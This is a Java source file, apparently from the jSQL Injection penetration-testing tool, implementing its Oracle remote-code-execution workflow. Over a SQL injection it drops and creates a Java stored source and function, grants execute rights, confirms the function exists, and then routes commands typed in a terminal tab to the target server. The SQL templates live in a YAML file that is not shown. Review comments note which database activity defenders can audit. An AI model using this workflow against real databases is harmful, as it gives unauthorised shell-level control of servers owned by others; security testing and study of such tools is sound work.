1 package com.jsql.model.accessible.engine;
2
3 import com.jsql.model.InjectionModel;
4 import com.jsql.model.accessible.ExploitMode;
5 import com.jsql.model.accessible.ResourceAccess;
6 import com.jsql.model.accessible.engine.oracle.ModelYamlOracle;
7 import com.jsql.view.subscriber.Seal;
8 import com.jsql.model.exception.JSqlException;
9 import com.jsql.model.injection.engine.model.EngineYaml;
10 import com.jsql.util.LogLevelUtil;
11 import org.apache.commons.lang3.StringUtils;
12 import org.apache.logging.log4j.LogManager;
13 import org.apache.logging.log4j.Logger;
14 import org.yaml.snakeyaml.Yaml;
15
16 import java.util.Arrays;
17 import java.util.UUID;
18
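/**
 * Oracle-specific exploit workflow of the injection engine.
 *
 * <p>The SQL templates are loaded from the Oracle engine's YAML resource and
 * are not visible in this class; this class only fills in object names and
 * sends the resulting statements through the {@link InjectionModel}.
 *
 * <p>Every request is sent with a metadata label. Keeping those labels
 * distinct per step is what lets an operator or a reviewer attribute each
 * request in the tool's own request log.
 *
 * <p>NOTE(review): judging by the template names only (confirm against the
 * YAML), the sequence drops and recreates a Java source object and a function,
 * then issues a grant. On a monitored database that is the activity to audit:
 * creation of Java stored objects and permission grants.
 */
public class ExploitOracle {

    private static final Logger LOGGER = LogManager.getRootLogger();
    private final InjectionModel injectionModel;
    private final ModelYamlOracle modelYaml;

    // Fixed object names substituted into the YAML templates.
    private static final String RCE_JAVA_UTIL_SRC = "RCE_JAVA_UTIL_SRC";
    private static final String RCE_JAVA_UTIL_FUNC = "RCE_JAVA_UTIL_FUNC";

    /**
     * Binds the Oracle exploit section of the engine YAML to {@link ModelYamlOracle}.
     *
     * @param injectionModel model used to reach the engine definition and to send requests
     */
    public ExploitOracle(InjectionModel injectionModel) {
        this.injectionModel = injectionModel;
        // NOTE(review): the YAML text comes from the engine's own model resource.
        // If it could ever originate outside the application, the SnakeYAML loader
        // should be restricted to the expected types before calling loadAs.
        var yaml = new Yaml();
        this.modelYaml = yaml.loadAs(
            injectionModel.getMediatorEngine().getOracle().instance().getModelYaml().getResource().getExploit(),
            ModelYamlOracle.class
        );
    }

    /**
     * Sends the drop/add/grant templates, confirms that the function exists, and on
     * success asks the views to open a terminal tab bound to {@link #runRceCmd}.
     *
     * @param exploitMode requested mode; only {@code AUTO} and {@code QUERY_BODY} are
     *     recognised, any other value is logged and the same request sequence is used
     * @throws JSqlException propagated from the requests issued below
     */
    public void createRce(ExploitMode exploitMode) throws JSqlException {
        if (!Arrays.asList(ExploitMode.AUTO, ExploitMode.QUERY_BODY).contains(exploitMode)) {
            LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Exploit method not implemented, using query body instead");
        }

        var udf = this.modelYaml.getUdf();

        this.injectionModel.injectWithoutIndex(String.format(
            udf.getDropSource(),
            ExploitOracle.RCE_JAVA_UTIL_SRC
        ), "body#drop-src");
        // This request was tagged "body#drop-src" as well, which made the two drop
        // requests indistinguishable in the request log; give it its own label.
        this.injectionModel.injectWithoutIndex(String.format(
            udf.getDropFunc(),
            ExploitOracle.RCE_JAVA_UTIL_FUNC
        ), "body#drop-func");
        this.injectionModel.injectWithoutIndex(String.format(
            udf.getAddSource(),
            ExploitOracle.RCE_JAVA_UTIL_SRC,
            ExploitOracle.RCE_JAVA_UTIL_SRC
        ), "body#add-src");
        this.injectionModel.injectWithoutIndex(String.format(
            udf.getAddFunc(),
            ExploitOracle.RCE_JAVA_UTIL_FUNC,
            ExploitOracle.RCE_JAVA_UTIL_SRC
        ), ResourceAccess.ADD_FUNC);
        this.injectionModel.injectWithoutIndex(udf.getGrant(), "body#grant-exec");

        // The confirm template is expected to echo the function name back when it exists.
        var confirmResult = this.injectionModel.getResourceAccess().getResult(String.format(
            udf.getConfirm(),
            EngineYaml.TRAIL_SQL,
            ExploitOracle.RCE_JAVA_UTIL_FUNC
        ), ResourceAccess.BODY_CONFIRM);
        if (!confirmResult.contains(ExploitOracle.RCE_JAVA_UTIL_FUNC)) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE failure: java function not found");
            return;
        }
        LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE successful: java function found");

        // The callback looks the exploit instance up again on each call instead of capturing this.
        this.injectionModel.sendToViews(new Seal.AddTabExploitUdf(
            (String command, UUID terminalID) -> this.injectionModel.getResourceAccess().getExploitOracle().runRceCmd(command, terminalID)
        ));
    }

    /**
     * Formats the run-command template and forwards the outcome to the views.
     *
     * <p>A {@link JSqlException} is not rethrown: it is turned into an error text
     * built from {@code ResourceAccess.TEMPLATE_ERROR} and shown in the terminal.
     *
     * @param command text typed in the terminal tab; only spaces are encoded here
     *     (as {@code %20}), no other escaping is applied in this method
     * @param uuidShell identifier of the terminal that receives the result
     */
    public void runRceCmd(String command, UUID uuidShell) {
        String result;
        try {
            result = this.injectionModel.getResourceAccess().getResult(String.format(
                this.modelYaml.getUdf().getRunCmd(),
                ExploitOracle.RCE_JAVA_UTIL_FUNC,
                command.replace(StringUtils.SPACE, "%20"),
                EngineYaml.TRAIL_SQL
            ), ResourceAccess.UDF_RUN_CMD);
        } catch (JSqlException e) {
            result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command);
        }
        this.injectionModel.sendToViews(new Seal.GetTerminalResult(uuidShell, result));
    }
}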